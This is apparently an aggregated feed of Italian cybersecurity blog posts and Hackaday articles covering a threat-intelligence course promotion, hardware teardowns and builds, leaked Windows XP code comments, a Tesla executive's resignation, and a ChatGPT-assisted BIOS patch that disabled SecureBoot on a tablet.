Mancano 6 giorni alla quinta Live Class di Red Hot Cyber: “Dark Web & Cyber Threat Intelligence”
La quinta edizione della Live Class “Dark Web & Cyber Threat Intelligence”, uno tra i corsi più apprezzati realizzati da Red Hot Cyber è ormai alle porte: mancano solo 6 giorni all’inizio di uno dei corsi più richiesti dagli appassionati e professionisti della sicurezza informatica e abbiamo ancora 4 posti disponibili.
Il corso non si conclude con l’ultima lezione e con la certificazioneCyber Threat Intelligence professional (CTIP): al termine e superati gli esami, avrai accesso gratuito al laboratorio di intelligence DarkLab, creato da Red Hot Cyber, dove potrai mettere in pratica le competenze acquisite lavorando su casi reali e collaborando con esperti del settore per entrare direttamente nel mondo del lavoro in modo pratico.
Contattaci tramite WhatsApp al 379 163 8765 per maggiori informazioni o scrivici a: formazione@redhotcyber.com
Cos’è una Live Class?
Una Live Class non è un semplice corso online registrato. È una vera lezione in diretta: un format immersivo dove lo studente può interagire con il docente, fare domande, condividere esperienze, e confrontarsi in tempo reale con altri partecipanti.
Durante la lezione, sarà possibile interrompere il professore per approfondimenti o richieste specifiche, rendendo l’apprendimento un’esperienza personalizzata e dinamica. A guidare il percorso, come sempre, ci sarà Pietro Melillo, PhD presso Università del Sannio e Docente presso IUSI University e docente esperto e divulgatore con anni di esperienza nel campo della threat intelligence.
Queste saranno le date della quinta live class in partenza domenica prossi,a-
- Domenica 15 Giugno dalle 16 alle 19
- Domenica 22 Giugno dalle 16 alle 19
- Domenica 29 Giugno dalle 16 alle 19
- Domenica 6 Luglio dalle 16 alle 19
- Domenica 13 Luglio dalle 16 alle 19
Le iscrizioni sono ancora aperte, ma i posti sono limitati: ogni classe viene mantenuta a numero chiuso con un massimo di 12/14 studenti per garantire la massima qualità didattica. E al termine del corso, sarà possibile accedere al DarkLab: un ambiente online dove potrai sperimentare in modo protetto le tecniche apprese, lavorare su casi reali e collaborare con altri esperti del settore.
Contattaci tramite WhatsApp al 379 163 8765 per maggiori informazioni o scrivici a: formazione@redhotcyber.com
Speech di Pietro Melillo, CISO di Wuerth Italia e direttore del gruppo DarkLab, dal titolo ‘Un anno di DarkLab. Tra Intelligence e Threat Actors’ all’interno della Red Hot Cyber Conference 2025.
Il corso “Dark Web & Cyber Threat Intelligence”
Questo percorso è pensato per fornire una panoramica concreta e operativa su tutto ciò che ruota attorno all’intelligence cyber, alla raccolta informativa da fonti aperte e al monitoraggio delle minacce presenti nei canali underground del web. per comprendere meglio il programma del corso, potete accedere alla pagina del corso “Darkweb & Cyber Threat Intelligence”.
Non è richiesta una preparazione avanzata: il corso parte dai fondamenti per arrivare a tecniche reali e strumenti usati nel mondo della cybersecurity professionale. Il tutto, in modalità live, con esercitazioni pratiche, case study, strumenti reali e un forte orientamento al lavoro sul campo.
I partecipanti impareranno a navigare in sicurezza su reti come Tor, analizzare marketplace illegali, individuare minacce emergenti e raccogliere informazioni utili da ambienti underground. Il corso affronta anche le principali tecniche utilizzate dai cyber criminali, dai ransomware-as-a-service ai broker di accesso, fino ai malware info-stealer e le botnet.
Durante il percorso vengono analizzati i principali strumenti e metodi utilizzati in ambito Cyber Threat Intelligence (CTI), inclusi l’identificazione dei threat actor, la raccolta di indicatori di compromissione (IoC), l’analisi OSINT e la gestione del ciclo di intelligence. Il taglio del corso è operativo e guidato da esperti del settore, con l’obiettivo di fornire competenze immediatamente applicabili nel monitoraggio delle minacce e nella gestione del rischio cyber.
Contattaci tramite WhatsApp al 379 163 8765 per maggiori informazioni o scrivici a: formazione@redhotcyber.com
consegna certificati Cyber Threat Intelligence professional (CTIP) di Red Hot Cyber
Scontistiche per accedere alla Live Class
Sono disponibili agevolazioni esclusive per chi desidera partecipare a questa nuova edizione della Live Class:
📌 30% DI SCONTO se hai già acquistato un corso e-learning su Academy
📌 30% DI SCONTO se hai acquistato tutti e tre i fumetti di Betti-RHC nei mesi precedenti
📌 20% DI SCONTO se porti un amico al corso con te
📌 15% DI SCONTO se sei uno studente
📌 10% DI SCONTO se condividi il corso sui tuoi canali social riportando il link: academy.redhotcyber.com
Cosa ne pensano le persone del nostro corso
Cosa pensano davvero le persone che hanno partecipato alle precedenti edizioni del corso? È una domanda che in molti si pongono prima di iniziare un percorso formativo impegnativo come questo. E la risposta arriva in modo chiaro da chi ha già vissuto l’esperienza: il corso ha saputo lasciare un segno, offrendo non solo competenze pratiche e spendibili, ma anche un ambiente stimolante e coinvolgente.
Francesco Demarcus che ha partecipato alla terza live class ha riportato “Consiglio a chiunque voglia conoscere o approfondire i temi sulla Cybersecurity di aprofittare della formazione erogata da hashtag #RHC. Ho potuto toccare di persona ciò che vive dietro quel peperoncino rosso, un mondo fatto di persone competenti, affermate nella loro professione che con grande entusiasmo guidano il percorso formativo di ogni partecipante. Non sono le solite Live Class fini a se stesse, c’è interazione, scambio di idee, consigli pratici e tante opportunità che potrete toccare con mano una volta iscritti. Ho l’onore di far parte del gruppo DarkLab e non potete capire le persone speciali che ho conosciuto“.
Giulio Cosentino della quarta live class ha riportato “Corso interessante, denso di spunti pratici e teorici, che rappresenta per me il punto di ripartenza dopo tanti anni di cybervacanza. Un’esperienza formativa che riaccende la passione per la cybersecurity, apre nuove prospettive di crescita e stimola la voglia di rimettersi in gioco”.
Fabio Perin della prima live class invece ha detto “Grazie a Pietro Melillo e Red Hot Cyber per i contenuti del corso CTIP e la qualità della Vostra formazione“.linkedin.com/posts/inva-m-6896…
Inva Malaj della seconda live class ha riportato “Un sincero ringraziamento al team di Red Hot Cyber per questa straordinaria opportunità di crescita professionale. Sono immensamente grata al mio nuovo docente, linkedin.com/in/ACoAABHerdABfL…Pietro Melillo, per l’incredibile supporto e fiducia nel corso “Dark Web & Cyber Threat Intelligence”.
Contattaci tramite WhatsApp al 379 163 8765 per maggiori informazioni o scrivici a: formazione@redhotcyber.com
Ma finito il corso inizia il più bello con il gruppo DarkLab
Al termine del corso, chi lo desidera potrà entrare a far parte del laboratorio di intelligence DarkLab di Red Hot Cyber: un ambiente operativo e collaborativo dove le conoscenze acquisite durante le live class prendono forma concreta.
Non si tratta di una formazione fine a se stessa. I corsisti una volta dentro DarkLab, avranno l’opportunità di mettere in pratica quanto appreso, confrontandosi con altri membri, scambiando informazioni, analizzando minacce reali e redigendo report strutturati sotto la guida di esperti del settore della cyber threat intelligence.
Questo laboratorio ha già dato vita a una serie di report di intelligence realizzati da gruppi di corsisti, supportati da professionisti, su tematiche cruciali come infostealer, botnet e cyber organized crime. Questi elaborati rappresentano un esempio concreto delle attività che i membri di DarkLab possono svolgere e sono consultabili a questo indirizzo.
Contattaci tramite WhatsApp al 379 163 8765 per maggiori informazioni o scrivici a: formazione@redhotcyber.com
L'articolo Mancano 6 giorni alla quinta Live Class di Red Hot Cyber: “Dark Web & Cyber Threat Intelligence” proviene da il blog della sicurezza informatica.
Nintendo Switch 2 Teardown, Let’s A-Go!
A new console challenger has appeared, and it goes by the name Nintendo Switch 2. The company’s latest iteration of the home console portable hybrid initially showed promise by featuring a large 1080p display, though very little official footage of the handheld existed prior to the device’s global release last week. However, thanks to a teardown video from [TronicsFix], we’ve got a little more insight into the hardware.
The technical specifications of this new console have been speculated on for the last handful of years. We now know NVIDIA is again providing the main silicon in the form of a custom 8x ARM Cortex A78C processor. Keeping the system powered is a 5220 mAh lithium ion battery that according to [TronicsFix] is held in with some seriously strong adhesive.
On the plus side for repairability, the onboard microphone and headphone jack are each attached by their own ribbon cable to the motherboard. The magnetic controller interfaces are also modular in design as they may one day prove to be a point of failure from repeated detachment. Speaking of which, [TronicsFix] also took apart the new version of the Joy-Con controller that ships with the system.
Arguably the biggest pain point for owners of the original Nintendo Switch was the reliability of the analog sticks on the diminutive controllers. There were widespread reports of “stick drift” that caused players to lose control as onscreen avatars would lazily move in one direction without player input. For the Switch 2, the Joy-Con controllers feature roughly the same number of dome switch buttons as well as haptic feedback motors. The analog sticks are larger in size on the outside, but feature the same general wiper/resistor design of the original. Many will cry foul of the continued use of conventional analog stick design in favor of hall effect sensors, but only time will tell if the Nintendo Switch 2 will repeat history.
youtube.com/embed/TaNmhUKtgzs?…
Good Morning Milano #1: Backstage UNIMI
Le mie attività della settimana (nel caso qualche progetto vi interessasse!)
zerodays.podbean.com/e/good-mo…
Garden Hose Gets Laminar Flow
We aren’t sure if [Joshua Bellamy] is serious that he wants a laminar flow to water his plants, but there are many places where having a smooth and predictable flow of water is useful or even essential. With his 3D printed adapter, you can produce laminar flow from any garden hose.
If you haven’t heard the term before, laminar flow is to water what a laser is to light. The water moves in parallel tracks with minimal mixing and turbulence. Ensuring laminar flow is often critical to precise flow metering, for example.
This isn’t [Joshua]’s first attempt. He has made a nozzle like this before, but it required a lot of assembly (“more fiddly bits than a Swedish flat-pack sofa” according to the post). Depending on the version, you’ll need various bits of extra hardware in addition to the 3D printed parts. Some versions have drop-in nuts and even an LED. Fiberglass insulation at the inlet diffuses turbulence, and some manual work on the output provided better results. When everything is working, the output of the hose should look like a glass rod, as you can see in the video below.
Air can also have laminar or non-laminar flow. Laminar air flow in a laser cutter’s air assist can make a big difference. If you don’t fancy 3D printing, you could save some drinking straws from your last few hundred trips to the local fast food emporium.
youtube.com/embed/NR1pHoJyJXc?…
Svelati i segreti del codice di Windows XP: frasi shock tra i commenti
Nel 2020, il codice sorgente di Windows XP è trapelato online attraverso una pubblicazione su 4chan. Sebbene non fosse completo al 100%, era abbastanza esteso da permettere a diversi sviluppatori indipendenti di ricostruirlo e compilarlo. Tra questi, un utente conosciuto con il nickname NCD è riuscito nell’impresa e ha pubblicato un video su YouTube che mostrava Windows XP in esecuzione da una build ottenuta proprio da quel codice. Microsoft è intervenuta facendo rimuovere il video, ma senza procedere con azioni legali pesanti.
Il codice, una volta ricompilato, ha suscitato grande curiosità nella comunità informatica. Non tanto per il valore pratico del sistema operativo in sé, ormai obsoleto, quanto per la possibilità di vedere “dentro” uno dei software più iconici della storia di Microsoft. La possibilità di studiare come erano scritte certe funzioni, l’organizzazione interna dei file, e gli approcci alla sicurezza adottati all’epoca, ha spinto molti appassionati e sviluppatori a esplorarne ogni angolo.
Un’analisi dettagliata di questo codice è stata recentemente condotta da ricercatori del collettivo Enferman, che hanno scavato tra milioni di righe alla ricerca di commenti curiosi, battute interne e frustrazioni degli sviluppatori. Il risultato è stato condiviso in un video su YouTube, disponibile qui: youtube.com/watch?v=nnt5_qWX0e…, e anticipato con alcuni highlight sul profilo X di Enderman: x.com/endermanch/status/192304….
Uno degli aspetti più affascinanti del lavoro di Enferman è stato proprio l’approccio di “archeologia del codice”. Analizzando stringhe testuali come “fuck”, “shit”, o “wtf”, hanno individuato decine di commenti sarcastici o rabbiosi nascosti nel codice, che offrivano uno spaccato molto umano del processo di sviluppo.
Alcuni sviluppatori lasciavano note del tipo: // fuck this crap
accanto a funzioni particolarmente complicate, oppure // TODO: understand this magic before we ship
, a dimostrazione di quanto fosse a volte difficile padroneggiare interamente il sistema.
Altri commenti emersi dalla ricerca includevano battute interne tra colleghi, riferimenti a problemi hardware dell’epoca, e addirittura frasi rivolte agli utenti più frustranti, come// don’t blame us if this breaks again
. Questi frammenti sono vere e proprie gemme nascoste che raccontano la storia viva di un software non solo come prodotto tecnico, ma come risultato del lavoro – e delle emozioni – di decine di persone.
L’analisi di Enferman ha il pregio di restituire un’immagine più autentica dello sviluppo software nei primi anni 2000, prima che ogni riga di codice fosse filtrata da processi legali, QA e comunicazione aziendale. È anche un promemoria del fatto che, dietro ogni sistema operativo, si nasconde una fitta rete di decisioni, compromessi, intuizioni geniali e inevitabili frustrazioni umane.
L'articolo Svelati i segreti del codice di Windows XP: frasi shock tra i commenti proviene da il blog della sicurezza informatica.
IO E CHATGPT E02: Come parlare con ChatGPT
In questo secondo episodio ci occupiamo dell'"arte di fare domande intelligenti" alla intelligenza artificiale generativa, per ottenere migliori risultati.
zerodays.podbean.com/e/io-e-ch…
Wireless Power Makes For Cable-Free Desk
Some people hate cables with a passion; others are agnostic and prefer cabled peripherals to having to stop and charge their mouse. [Matt] from DIYPerks has the best of both worlds with this wireless-powered, no-cable desk setup.
The secret is embedded within the plywood desk: an evaluation kit from Etherdyne Technologies, Inc consisting of a 100 W RF power supply and its associated power antenna looping around the desktop edge. The mechanism is similar to the inductive charging often seen on phones nowadays, but at higher frequency and larger scale, enabling power to be transmitted several feet (at least a meter) above the desktop.The range is impressive (this isn’t the maximum), but the efficiency is not advertised.
The kit from ETI contained several PCB-coil receivers, which [Matt] built into a number of devices, including a lamp, heated cup, microphone, speakers, his mouse, keyboard, and even a custom base to run his monitor, which really shows the power these things can pull.
The microphone is a non-Bluetooth RF unit lovingly modified to studio quality, at least as far as we can tell on laptop speakers through YouTube’s compression. The speakers use a pair of Bluetooth modules to negotiate stereo sound while staying in sync. And before you ask “what about signal for the monitor?”– we have to inform you that was taken care of too, via a wireless HDMI dongle. Check it out in the video below.
Of course the elephant in the room here is power usage — there’s a 10 W base draw, and probably a big hit to efficiency vs cabled-everything– but we figure he gets partway to a pass on that by using a Frameworks mainboard instead desktop hardware. Indeed, a full analysis might show that the transmission efficiency of this system is no worse than the power to charge/discharge inefficiencies in a more conventional battery powered wireless setup.
While no wires is pretty clean, we’re not sure this beats the totally-hidden-in-the-desk PC [Matt] built last year in terms of minimalist aesthetic. That Frameworks mainboard also likely lacks the power of his triple-screen luggable, but this was still an entertaining build.
youtube.com/embed/EyR2-C9ggi0?…
Hackaday Links: June 8, 2025
When purchasing high-end gear, it’s not uncommon for manufacturers to include a little swag in the box. It makes the customer feel a bit better about the amount of money that just left their wallet, and it’s a great way for the manufacturer to build some brand loyalty and perhaps even get their logo out into the public. What’s not expected, though, is for the swag to be the only thing in the box. That’s what a Redditor reported after a recent purchase of an Nvidia GeForce RTX 5090, a GPU that lists for $1,999 but is so in-demand that it’s unobtainium at anything south of $2,600. When the factory-sealed box was opened, the Redditor found it stuffed with two cheap backpacks instead of the card. To add insult to injury, the bags didn’t even sport an Nvidia logo.
The purchase was made at a Micro Center in Santa Clara, California, and an investigation by the store revealed 31 other cards had been similarly tampered with, although no word on what they contained in lieu of the intended hardware. The fact that the boxes were apparently sealed at the factory with authentic anti-tamper tape seems to suggest the substitutions happened very high in the supply chain, possibly even at the end of the assembly line. It’s a little hard to imagine how a factory worker was able to smuggle 32 high-end graphics cards out of the building, so maybe the crime occurred lower down in the supply chain by someone with access to factory seals. Either way, the thief or thieves ended up with almost $100,000 worth of hardware, and with that kind of incentive, this kind of thing will likely happen again. Keep your wits about you when you make a purchase like this.
Good news, everyone — it seems the Milky Way galaxy isn’t necessarily going to collide with the Andromeda galaxy after all. That the two galactic neighbors would one day merge into a single chaotic gemisch of stars was once taken as canon, but new data from Hubble and Gaia reduce the odds of a collision to fifty-fifty over the next ten billion years. What changed? Apparently, it has to do with some of our other neighbors in this little corner of the universe, like the Large Magellanic Cloud and the M33 satellite galaxy. It seems that early calculations didn’t take the mass of these objects into account, so when you add them into the equation, it’s a toss-up as to what’s going to happen. Not that it’s going to matter much to Earth, which by then will be just a tiny blob of plasma orbiting within old Sol, hideously bloated to red giant status and well on its way to retirement as a white dwarf. So there’s that.
A few weeks ago, we mentioned an epic humanoid robot freakout that was making the rounds on social media. The bot, a Unitree H1, started flailing its arms uncontrollably while hanging from a test stand, seriously endangering the engineers nearby. The line of the meltdown was that this was some sort of AI tantrum, and that the robot was simply lashing out at the injustices its creators no doubt inflicted upon it. Unsurprisingly, that’s not even close to what happened, and the root cause has a much simpler engineering explanation. According to unnamed robotics experts, the problem stemmed from the tether used to suspend the robot from the test frame. The robot’s sensor mistook the force of the tether as constant acceleration in the -Z axis. In other words, the robot thought it was falling, which caused its balance algorithms to try to compensate by moving its arms and legs, which caused more force on the tether. That led to a positive feedback loop and the freakout we witnessed. It seems plausible, and it’s certainly a simpler explanation than a sudden emergent AI attitude problem.
Speaking of robots, if you’ve got a spare $50 burning a hole in your pocket, there are probably worse ways to spend it than on this inexplicable robot dog from Temu. Clearly based on a famous and much more expensive robot dog, Temu’s “FIRES BULLETS PET,” as the label on the box calls it, does a lot of things its big brother can’t do out of the box. It has a turret on its back that’s supposed to launch “water pellets” across the room, but does little more than weakly extrude water-soaked gel capsules. It’s also got a dance mode with moves that look like what a dog does when it has an unreachable itch, plus a disappointing “urinate” mode, which given the water-pellets thing would seem to have potential; alas, the dog just lifts a leg and plays recorded sounds of tinkling. Honestly, Reeves did it better, but for fifty bucks, what can you expect?
And finally, we stumbled across this fantastic primer on advanced semiconductor packaging. It covers the entire history of chip packaging, starting with the venerable DIP and going right through the mind-blowing complexity of hybrid bonding processes like die-to-wafer and wafer-to-wafer. Some methods are capable of 10 million interconnections per square millimeter; let that one sink in a bit. We found this article in this week’s The Analog newsletter, which we’ve said before is a must-subscribe.
Bringing a Father Ted Joke to Life
Inspired by a gag from a mid-90s sitcom Father Ted, [Stephen] decided to create his own talking tape dispenser.
This project is a actually a follow-up to the first version of the dispenser he built back in 2022, and [Stephen] has documented the process thoroughly for anyone wanting to build their own. In the first version, he modified a tape dispenser to house a Raspberry Pi, enabling voice functionality. In the new version, he replaced the Raspberry Pi with a cheaper ESP8266 and designed an entirely 3D printed dispenser that looks closer to the screen-used version.
A clever change was replacing the rotary encoder with a custom encoder embedded in the printed parts. Using a photodiode and an LED, it measures the tape pulled from the spool. As you pull the tape, the encoder calculates the length and announces it through the speaker, just like in the show.
If you’re into prop recreations like this, be sure to check out the winners of our 2022 Sci-Fi Contest.
youtube.com/embed/zKlZgHTyWA4?…
Simple Triggering for Saleae Logic Analyzers
Saleae logic analyzers seem to have it all: good sampling rates, convenient protocol decoding, and plenty of channels – but not a good way to set rising or falling-edge triggering. [James] found this rather inconvenient when debugging embedded devices, and shared a workaround that replicates these simple triggering modes.
Crucially, the logic analyzer’s software has a repeated triggering mode that fires when the protocol decoder detects a preset value. [James] used a clever trick to turn this into a rising-edge trigger: he set up a simple parallel analyzer, and set the signal in question as both the sampled channel and the clock signal. Since he wanted to detect the rising edge, he set the clock mode accordingly. Next, he loaded the simple parallel decoder’s trigger configuration and set it to detect a value of one, the value of a high signal. When he ran the simple parallel trigger, every rising edge of the input signal would trigger the clock to check for a high value on the line, in turn triggering the analyzer.
It’s also possible to set up a falling-edge trigger by selecting the falling-edge clock mode and setting the trigger mode to detect a value of zero. Setting up more complex triggers involving multiple channels is as simple as calculating the hexadecimal value of the desired state and setting the parallel decoder to trigger on that value. For example, if you want to trigger when one input is low and another is high, you can set the decoder to trigger on a value or one or two, depending on which order the inputs come in.
If all this makes you interested in Saleae logic analyzers, we’ve seen them used for everything from floppy disk preservation to signal generation. We’ve even reviewed their earliest model back in 2009.
youtube.com/embed/VVu-2U9KXYE?…
Piano Doorbell Adds Music To Your Home
Regular ding-dong doorbells are fun and all, but it can be nice to put something a little more special by your front door. To that end, [Arpan Mondal] built this neat little piano doorbell to make visiting his home just a touch more fun.
The heart of the build is an ESP32 microcontroller. It’s responsible for reading the state of five 3D printed piano keys: three white, two black. It’s nowhere near a full octave, but for a doorbell, it’s enough. When a key is pressed, the ESP32 plays a short audio sample embedded within the program code itself. This is done with the help of a PAM8403 audio amplifier module, which jacks up the output to drive the doorbell speaker loud enough to be heard throughout the home. It’s not exactly studio quality audio, but for a doorbell, it sounds pretty solid.
If you’re looking for a fun and easy build to make your home just a little bit more whimsical, it’s hard to beat something like this. Your musical friends will love it—they might even develop an intro riff of their very own. We’ve featured some other fun doorbell builds before, too—the best of which are the Halloween projects.
youtube.com/embed/Bk9v_OFMDGc?…
A Close Look at the Mitxela Precision Clock Mk IV
Over on his secondary YouTube channel, [Jeff Geerling] recently demoed the new Mitxela Precision Clock Mk IV.
This clock uses GPS to get the current time, but also your location so it can figure out what time zone you’re in and which daylight savings time might apply. On the back a blinking diode announces the arrival of each second. A temperature-compensated crystal oscillator (TCXO) is employed for accurate time-keeping.
The clock can be folded in half, thereby doubling as a clapperboard for movie makers. The dimming system is analog, not pulse width modulation (PWM), which means no visible flashing artifacts when recording. It is highly configurable and has USB connectivity. And it has not one but two ARM microcontrollers, an ARM STM32L476, and an ARM STM32L010. If you’re interested, you can pick one up for yourself from [Mitxela]’s shop.
Toward the end of his video [Jeff] does some navel gazing, thinking about what might be required if future versions of the clock wanted to get down into precision at the nanosecond level. Do you arrange it so the light arrives at the viewer’s eyeball at the right time? Or do you update it on the clock at the right time and let the viewer know about it after a minuscule delay? Philosophical preponderances for another day!
We should add that we’ve seen plenty of cool stuff from [Mitxela] before, including the Euroknob and these soldering tweezers.
youtube.com/embed/aBDgD032DEI?…
Wave Drive Made With 3D Printed Parts
You can get just about any gear reduction you want using conventional gears. But when you need to get a certain reduction in a very small space with minimal to no backlash, you might find a wave drive very useful. [Mishin Machine] shows us how to build one with (mostly) 3D printed components.
The video does a great job of explaining the basics of the design. Right off the bat, we’ll say this one isn’t fully printed—it relies on off-the-shelf steel ball bearings. It’s easy to understand why. When you need strong, smooth-rolling parts, it’s hard to print competitive spheres in plastic at home. Plastic BBs will work too, though, as will various off-the-shelf cylindrical rollers. The rest is mostly 3D printed, so with the right design, you can whip up a wave drive to suit whatever packaging requirements you might have.
Combined with a stepper motor and the right off-the-shelf parts, you can build a high-reduction gearbox that can withstand high torque and should have reasonable longevity despite being assembled with many printed components.
We’ve seen other interesting gear reductions before, too.
youtube.com/embed/zOLQw-TxE7s?…
Shock in Tesla: Si dimette il padre del robot umanoide Optimus!
Technology Desk, Nuova Delhi. Milan Kovac, responsabile del programma di robot umanoidi Optimus di Tesla, ha annunciato venerdì le sue dimissioni dal suo incarico, in quanto desidera tornare a casa per trascorrere più tempo con la sua famiglia. Kovac ha pubblicato questo annuncio in un emozionante post su X, chiarendo che questa decisione è personale e non è legata ad alcun problema interno a Tesla.
Kovac ha scritto: “Questa settimana ho dovuto prendere la decisione più difficile della mia vita e mi dimetto dal mio incarico. Sono stato lontano da casa per molto tempo e ho bisogno di trascorrere del tempo con la mia famiglia. Voglio chiarire che questa è l’unica ragione”.
Kovac è entrato in Tesla nel 2016 come ingegnere nel team principale di Autopilot. In seguito ha guidato il programma Optimus, dove ha svolto un ruolo chiave nello sviluppo da zero del robot umanoide di Tesla. È stato nominato vicepresidente nel settembre 2023.
Ha scritto: “La transizione alla creazione e alla guida dell’Optimus Group all’inizio del 2022 è stata un’esperienza completamente diversa per me, quando avevamo solo pochi bracci Kuka invertiti. Dovevamo costruire insieme una piattaforma completa di hardware e software. E questo fantastico team ce l’ha fatta. Ce l’hanno fatta loro, non io”.
Kovac ha ribadito la sua fiducia nella missione di Tesla e la sua ammirazione per il CEO Elon Musk, nonostante la sua partenza dall’azienda.
Ha scritto: “Il mio sostegno a @elonmusk e al team è incrollabile: il Team Tesla per SEMPRE. Elon, mi hai insegnato a distinguere il segnale dal rumore, una resilienza estrema e molti principi fondamentali dell’ingegneria. Te ne sarò per sempre grato”. L’ingegnere veterano ha anche salutato i colleghi di diversi reparti. Era noto internamente per la sua grande concentrazione e le maratone notturne di debugging. Ha aggiunto: “È stata un’esperienza davvero speciale lavorare con persone così talentuose e ho piena fiducia in loro per portare Optimus al livello successivo”.
Kovac ha concluso esprimendo fiducia nel futuro di Tesla: “Tesla vincerà, ve lo garantisco”. Secondo quanto riportato da Bloomberg News, Kovac si dimetterà immediatamente e sarà sostituito da Ashok Eluswami, responsabile dei team Autopilot di Tesla.
Musk ha precedentemente affermato che Tesla prevede di costruire migliaia di robot Optimus quest’anno. Ad aprile ha affermato che le restrizioni cinesi all’esportazione di magneti in terre rare avevano influenzato la produzione dei robot umanoidi.
L'articolo Shock in Tesla: Si dimette il padre del robot umanoide Optimus! proviene da il blog della sicurezza informatica.
Scratch-built Electric Boat Shows off Surprising Speed
Electric cars are everywhere these days, but what about boats? Looking to go green on the water, [NASAT] put together this impressively nimble boat propelled by a pair of brushless motors.
The boat itself has a completely custom-built hull, using plywood as a mold for the ultimate fiberglass body. It’s a catamaran-like shape that seems to allow it to get on plane fairly easily, increasing its ultimate speed compared to a displacement hull. It gets up to that speed with two electric motors totaling 4 kW, mated to a belt-driven drivetrain spinning a fairly standard prop. Power is provided by a large battery, and the solar panel at the top can provide not only shade for the operator, but 300 W to charge the battery when the motors are not being used.
With the finishing touches put on, the small single-seat boat effortlessly powers around the water with many of the same benefits of an electric car: low noise, low pollution, a quiet ride, and a surprisingly quick feel. Electrification has come for other boats as well, like this sailing catamaran converted to electric-only. Even some commercial boats have begun to take the plunge.
youtube.com/embed/IgSD35CzPbs?…
Building a Cyberpunk Modular Keyboard
Perhaps you have a tilt towards glowing cyberpunk peripherals. Perhaps you’ve been hunting for a keyboard that you can position perfectly to suit both your left and right hands. In that case, you might just like this nifty design from [Modern Hobbyist].
The first thing you’ll note is the split design, which allows each half of the keyboard to be placed optimally for each arm’s comfort. They’re linked with a cable, which allows the STM32 microcontroller to read the keys on both sides and then spit out the right stuff upstream over its USB-C connection. The microcontroller is also in charge of running the per-key LED lighting and the LCD screens on each half.
The board owes its sleek and slim design at least in part to using Kailh Choc low-profile switches. They plug in to hotswap compatible sockets so the switches can easily be changed if desired. Keycaps are blank off-the-shelf parts because this is a keyboard for those who aren’t afraid to spend the time establishing the right muscle memory. It might take some adaptation if you’re not used to the staggered columnar layout. However, the LCD screens can display a keymap if you need a little help now and then.
We’ve seen a lot of great split keyboards over the years, including one amusing design made by hacking an existing keyboard in half with a saw.
youtube.com/embed/KwFWBdfZKnI?…
Single Tube SDR Is a Delightful Mix of Old and New
Software Defined Radio (SDR) is the big thing these days, and why not? A single computer can get rid of a room full of boat anchors, and give you better signal discrimination than all but the best kit. Any SDR project needs an RF receiver, and in this project [mircemk] used a single 6J1 vaccum tube to produce an SSB SDR that combines the best of old and new.
Single-tube radios are a classic hack, and where a lot of hams got started back in the day, but there is a reason more complicated circuits tend to be used. On the other hand, if you can throw a PC worth of signal processing at the output, it looks like you can get a very sensitive and selective single-sideband (SSB) receiver.
The 6J1 tube is convenient, since it can run on only 6 V (or down to 3.7 as [mircemk] demonstrates). Here it is used as a mixer, with the oscillator signal injected via the screen grid. Aside from that, the simple circuit consists of a receiving coil, a few resistors and a variable capacitor. How well does it work? Quite well, when paired with a PC; you can judge for yourself in the video embedded below.
We’ve featured a lot of [mircemk]’s projects over the years, likethis handsome OLED VU meter, or thisfrequency analyzer with a VFD and evena virtual pinball cabinet made from scraps, among many others.
youtube.com/embed/SD4X9S0OL0I?…
Let’s Buy Commodore! Well, Somebody Is.
When a man wearing an Atari T-shirt tells you he’s buying Commodore it sounds like the plot for an improbable 1980s movie in which Nolan Bushnell and Jack Tramiel do battle before a neon synthwave sunset to a pulsating chiptune soundtrack. But here on the screen there’s that guy doing just that, It’s [Retro Recipes], and in the video below he’s assembling a licensing deal for the Commodore brand portfolio from the distant descendant of the Commodore of old.
It’s a fascinating story and we commend him for tracing a path through the mess that unfolded for Commodore in the 1990s. We tried the same research path with a friend a few years ago and ended up with an anonymous Dutch paper company that wouldn’t answer our calls, so we’re impressed. In conjunction with several other players in the Commodore retrocomputing world he’s trying to assemble a favourable percentage deal for manufacturers of new parts, computers, and other goodies, and we’re pleased to see that it’s for the smaller player as much as for the industry giant.
When looking at a story like this though, it’s important not to let your view become clouded by those rose tinted glasses. While it’s great that we’re likely to see a bunch of new Commodore-branded Commodore 64s and parts, there are many pitfalls in taking it beyond that. We’ve seen the Commodore logo on too many regrettable licensed products in the past, and we fear it might be too tempting for it to end up on yet another disappointing all-in-one video game or just another budget PC. If something new comes out under the Commodore brand we’d like it to be really special, exploiting new ground in the way the Amiga did back in the day. We can hope, because the alternative has dragged other famous brands through the mud in recent years.
If you want an insight into the roots of the original Commodore’s demise, have a read of our Hackaday colleague [Bil Herd]’s autobiography.
youtube.com/embed/lN8r4LRcOXc?…
Header: Evan-Amos, Public domain.
ChatGPT Patched a BIOS Binary, and it Worked
[devicemodder] wrote in to let us know they managed to install Linux Mint on their FRP-locked Panasonic Toughpad FZ-A2.
Android devices such as the FZ-A2 can be locked with Factory Reset Protection (FRP). The FRP limits what you can do with a device, tying it to a user account. On the surface that’s a good thing for consumers as it disincentivizes stealing. Unfortunately, when combined with SecureBoot, it also means you can’t just install whatever software you want on your hardware. [devicemodder] managed to get Linux Mint running on their FZ-A2, which is a notable achievement by itself, but even more remarkable is how it was done.
So how did [devicemodder] get around this limitation? The first step was to dump the BIOS using a CH341A-based programmer. From there, the image was uploaded to ChatGPT along with a request to disable SecureBoot. The resulting file was flashed back onto the FZ-A2, and all available fingers were crossed.
And… it worked! ChatGPT modified the BIOS enough that the Linux Mint installer could be booted from a flash drive. There are a bunch of bugs and issues to work through but in principle we have just seen AI capable enough to successfully patch a binary dump of BIOS code, which, for the record, is kind of hard to do. We’re not sure what all of this might portend.
So is uploading binaries to ChatGPT with requests for mods vibe coding? Or should we invent a new term for this type of hack?
Microsoft Looking to Enforce USB-C Features Through WHCP
As much as people love USB-C, there’s one massive flaw that becomes very obvious the moment you look at the ports on any computer. This being that there’s no (standardized) way to tell what any of those ports do. Some may do display out (Alt-Mode), some may allow for charging, but it remains mostly a matter of praying to the hardware gods. According to a recent blog post, this is where Microsoft will seek to enforce a USB-C feature set on all (mobile) computers compliant with its Windows Hardware Compatibility Program (WHCP).
This also comes after years of the USB Implementers Forum, re-branding the USB specifications, with the most recent iteration thankfully using the bandwidth (in Gbps) as specifier (meaning no ‘USB PlaidSpeed’, sadly). Claiming to follow this end-user friendly spirit, the Microsoft blog post goes on to a minimum set of features that USB-C ports should have, as detailed in the above table.
Most notable is probably that PC charging support is required, as is support for at least one external display. As for the negatives, this seems to only apply to laptops, and no actual charging requirements are set (USB-PD voltages, wattage, etc.), so what the actual impact of this will be remains to be seen.
One thing remains certain, however, and that is that by trying to make USB-C the One True Connector for literally everything, there will always remain cases where end-user expectations remain unfulfilled.
